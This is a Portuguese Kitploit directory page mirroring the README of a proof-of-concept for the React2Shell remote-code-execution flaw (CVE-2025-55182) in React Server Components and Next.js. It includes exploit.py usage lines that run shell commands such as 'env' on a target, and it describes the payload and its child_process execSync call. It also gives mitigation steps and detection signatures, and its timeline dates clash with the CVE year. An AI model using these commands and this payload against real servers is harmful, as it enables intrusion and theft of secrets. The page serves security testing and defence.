Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vulnerable-next-js-poc — PoC para React2Shell (CVE-2025-55182) | Kitploit
Ferramentas/GitHubGitHub/kondukto-io/vulnerable-next-js-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubkondukto-io/vulnerable-next-js-poc

vulnerable-next-js-poc

PoC para React2Shell (CVE-2025-55182)

Ver Repositório
51há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 (React2Shell) - Prova de Conceito

⚠️ APENAS PARA PESQUISA DE SEGURANÇA

Este repositório contém uma prova de conceito para CVE-2025-55182, uma vulnerabilidade crítica de execução remota de código nos Componentes de Servidor React. Destina-se apenas a testes de segurança autorizados e fins de pesquisa.

Visão Geral da Vulnerabilidade

  • ID CVE: CVE-2025-55182
  • Nome: React2Shell
  • Pontuação CVSS: 10.0 (CRÍTICA)
  • Tipo: CWE-502 - Desserialização de Dados Não Confiáveis
  • Vetor de Ataque: Rede (AV:N)
  • Autenticação: Nenhuma Necessária (PR:N)
  • Status: Exploração ativa em campo

Versões Afetadas

React:

  • 19.0.0
  • 19.1.0, 19.1.1
  • 19.2.0

Next.js:

  • 15.0.0 a 15.0.4
  • 15.1.0 a 15.1.8
  • 15.2.0 a 15.2.5
  • 16.0.0 a 16.0.6

Detalhes Técnicos

A vulnerabilidade explora desserialização insegura no protocolo Flight dos Componentes de Servidor React. Quando um servidor recebe uma carga maliciosa especialmente criada, ele falha ao validar corretamente a estrutura antes de desserializar, permitindo que dados controlados pelo atacante manipulem a execução no lado do servidor.

Mecanismo de Ataque

  1. Injeção de Chunk Falso: O atacante envia uma carga Flight com um objeto forjado imitando a estrutura interna de Chunk
  2. Sequestro de Manipulador de Promise: O objeto falso inclui um método then personalizado
  3. Manipulação de Estado: A desserialização do React tenta resolver o Chunk falso, acionando o manipulador do atacante
  4. Execução de Código: JavaScript arbitrário é executado no servidor via process.mainModule.require('child_process')

Configuração da POC

Pré-requisitos

  • Node.js 18+
  • Python 3.x (para o script de exploração)
  • npm ou yarn

Instalação

  1. Instalar dependências:
root@kitploit:~
npm install
  1. Iniciar o servidor vulnerável:
root@kitploit:~
npm run dev

O servidor iniciará em http://localhost:3000

Estrutura da Aplicação Vulnerável

root@kitploit:~
app/
├── page.js              # Página principal com ServerForm
├── ServerForm.js        # Componente cliente com formulário
├── actions.js           # Ação de Servidor Vulnerável
└── layout.js            # Layout raiz

Executando o Exploit

Uso Básico

root@kitploit:~
python3 exploit.py -t http://localhost:3000 -c "whoami"

Opções

  • -t, --target: URL alvo (obrigatório)
  • -c, --command: Comando de shell a executar (padrão: id)
  • --check-only: Apenas verificar se o alvo parece vulnerável

Exemplos

Verificar se o alvo está vulnerável:

root@kitploit:~
python3 exploit.py -t http://localhost:3000 --check-only

Executar comandos arbitrários:

root@kitploit:~
# Obter informações do usuário
python3 exploit.py -t http://localhost:3000 -c "id"

# Listar arquivos
python3 exploit.py -t http://localhost:3000 -c "ls -la"

# Criar um arquivo como POC
python3 exploit.py -t http://localhost:3000 -c "touch /tmp/pwned"

# Ler variáveis de ambiente
python3 exploit.py -t http://localhost:3000 -c "env"

Estrutura da Carga do Exploit

O exploit utiliza form-data multipart com:

root@kitploit:~
Campo "0": JSON malicioso com manipulador 'then' personalizado
Campo "1": Referência ao campo 0 ($@0)
Cabeçalho: Next-Action: x (aciona o processamento RSC)

A carga manipula o objeto interno _response para executar:

root@kitploit:~
process.mainModule.require('child_process').execSync('<comando>')

Mitigação

Ações Imediatas

  1. Atualizar React:

    root@kitploit:~
    npm install [email protected] [email protected]
    
  2. Atualizar Next.js:

    root@kitploit:~
    npm install [email protected]  # ou a versão corrigida mais recente
    

Versões Corrigidas

  • React: ≥ 19.3.0
  • Next.js:
    • ≥ 15.0.5
    • ≥ 15.1.9
    • ≥ 15.2.6
    • ≥ 16.0.7

Detecção

Indicadores de Comprometimento

  • Requisições POST inesperadas para endpoints RSC com cabeçalho Next-Action
  • Cargas form-data multipart com referências $@
  • Propriedades then suspeitas nos corpos das requisições
  • Anomalias na execução de processos no lado do servidor

Assinaturas de Rede

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data
...contendo {"then":"$@

Linha do Tempo

  • 3 de dezembro de 2024: Divulgação pública
  • 5 de dezembro de 2024: Exploração ativa observada
  • 26 de dezembro de 2024: Prazo de conformidade com o CISA KEV

Referências

  • Registro Oficial do CVE
  • Entrada no NVD
  • Catálogo KEV da CISA
  • Comunicado de Segurança da Wiz
  • Análise Técnica da OffSec

Aviso Legal

Esta prova de conceito é fornecida apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas computacionais é ilegal. Os autores não assumem qualquer responsabilidade pelo uso indevido desta informação.

NÃO:

  • Use este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar
  • Implemente em ambientes de produção
  • Compartilhe o código do exploit sem o contexto e avisos adequados

Licença

Licença MIT - Apenas para Fins de Pesquisa em Segurança

Baixar ferramenta